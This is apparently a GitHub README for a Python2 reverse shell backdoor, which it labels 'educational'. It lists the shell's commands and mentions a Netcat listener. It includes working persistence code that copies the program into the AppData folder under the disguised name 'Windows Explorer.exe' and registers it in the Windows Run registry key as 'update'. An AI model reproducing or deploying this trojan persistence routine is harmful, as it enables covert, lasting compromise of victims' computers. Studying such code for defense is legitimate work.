Skip to content

Latest commit

 

History

History
20 lines (18 loc) · 704 Bytes

README.md

File metadata and controls

20 lines (18 loc) · 704 Bytes

Python2-Reverse-Shell-Backdoor

Reverse Shell Backdoor made with Python2 using socket Made for educational porpuse Reverse Shell Backdoor made with Python2 using Socket TCp/Ip Server Can use The TCP/Ip server or use Netcat Commands of the Shell: "cd" "pwd" "descargar" "exit" Can be persistent like a trojan using shutil

def become_Persistent(self): evil_file_location = os.environ["appdata"] + "\Windows Explorer.exe" if not os.path.exists(evil_file_location): shutil.copyfile(sys.executable, evil_file_location) subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d + "'+ evil_file_location + '"', shell = True)